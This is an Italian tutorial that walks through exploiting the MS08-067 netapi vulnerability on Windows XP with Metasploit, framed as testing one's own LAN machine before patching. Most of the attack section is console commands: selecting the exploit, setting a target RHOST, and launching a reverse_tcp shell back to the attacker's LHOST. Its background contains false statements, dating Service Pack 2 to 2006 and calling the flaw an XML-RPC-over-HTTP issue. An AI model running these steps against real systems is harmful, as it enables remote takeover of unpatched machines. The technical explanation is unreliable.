Bucare WindowsXP SP2 con Metasploit

Vulnerabilità ms08_067_netapi

Dall'introduzione del Service Pack 2, in data Agosto 2006, Windows XP era ritenuto molto più
sicuro, vista l'introduzione di numerosi bugfix e il sistema di gestione del cosidetto “Centro di
Sicurezza”, che dal service pack 2 si interfaccia e comunica con vari software con il Windows
Firewall, e un sistema di aggiornamenti di sistema. Un giornalista di The Register, tale Thomas
Greene, ha definito il SP2 una sorta di placebo, volta a calmare, quindi non fixare totalmente i buci
scoperti nel SP1.
Oggi vi parlerò di una particolare vulnerabilità, denominata dal bollettino sulla sicurezza microsoft:
ms_08_067_netapi. Questo bug si trova nel sistema di gestione della dll netapi, che praticamente è
alla base di un servizio denominato XML-RPC, che attraverso http, codifica in XML delle richieste
di procedure remote tramite TCP/IP. Non vi è però alcun controllo per le richieste inviate a questo
servizio, e si è visto che in OS come Windows Server 2003 e Windows Xp, un qualsiasi utente
costruendo una richiesta RPC ad hoc, può eseguire codice malevolo senza problemi, in remoto e in
tutta tranquillità. Il bug è stato risolto e la patch KB958644 è disponibile per il download sul sito
microsoft in particolare a questo indirizzo:
http://www.microsoft.com/downloads/details.aspx?familyid=0D5F9B6E-9265-44B9-
A376-2067B73D6A03&displaylang=en

http://www.microsoft.com/technet/security/Bulletin/MS08-067.mspx
Come potete vedere dal link sopra evidenziato questo aggiornamento è considerato critico ed
indispensabile, per tutti le versioni di Windows. Quindi se non fate aggiornamenti dalla fine del
2008, meglio fare un salto e informarsi meglio.

Sfruttare la vulnerabilità

Ovviamente quando si è scoperta questa vulnerabilità, sono nati tantissimi exploit capaci di
sfruttarla, molti worm e trojan la usano. Oggi in particolare, vi mostrerò come testare su una
macchina locale l'exploit che sfrutta il suddetto bug, grazie al framework metasploit
(http://metasploit.com), installato su una linuxbox, attraverso la console del framework stesso.

Una volta scaricata ed installato il framework, per avviarlo andiamo nella cartella dove lo si è
estratto e avviamo la console con il comando

$ ./msfconsole

Avremo una schermata come questa:

Bene ecco la vostra shell del framework, visualizziamo gli exploit disponibili:
msf > show exploits

Ho evidenziato l'exploit che ci interessa...

diamo:
msf> use windows/smb/ms08_067_netapi

per selezionare l'exploit e

msf> show options

per vedere le opzioni del nostro exploit

come indicato dalle opzioni l'exploit agisce sulla porta 445, la microsoft-ds.
Ottimo, con uno scanner vediamo se la 445 del bersaglio è aperta, possiamo usare nmap da
metasploit... (ma non solo nmap)
Bene la porta 445 del pc connesso alla mia LAN (192.168.1.2), è aperta e l'OS è windows XP,
quindi è exploitabile (se non ha effettuato gli opportuni aggiornamenti).
Selezioniamolo come RHOST (remote host)

msf> set RHOST 192.168.1.2

Bene spegniamo il firewall se l'abbiamo attivato, io ho firestarter e da shell si spegne col comando:

msf> sudo firestarter ­p

Ora ciò di cui abbiamo bisogno è un payload compatibile con l'exploit, un payload per chi non lo
sapesse è uno speciale shell code che ci permette di usare un servizio, o avviare qualcosa in remoto,
sfruttando un'exploit.

msf> show payloads

Ce ne sono parecchi compatibili con il nostro exploit... quale proviamo? Perchè non una bella
reverse shell? Avvieremmo così un cmd.exe in remoto...

msf> set payload windows/shell/reverse_tcp
Ora ricontrolliamo le option, vedremo che si sono aggiunte le opzioni del payload, tutte blank da
settare:

Da completare abbiamo il parametro LHOST (il nostro ip locale...) bene settiamolo come sappiamo
fare:

msf> set LHOST 192.168.1.14

E ora che abbiamo settato tutto correttamente possiamo avviare l'exploit con il comando:

msf> exploit
Uuuuu! Ma quanto ci piace lo stdout??? Ma quanto??? Abbiamo un cmd.exe avviato sulla macchina
remota! E' vulnerabile a quanto pare, dobbiamo acchiappare il nostro pc e scaricare l'aggiornamento
subito!!! Ma prima diamo due comandi per vedere se effettivamente siamo sulla macchina...

Si...i dir vanno a buon fine...siamo a cavallo, e vulnerabili su quel pc. Diamoci una smossa
chiudiamo la sessione e affrettiamoci a scaricare l'aggiornamento sopra citato.
vikkio88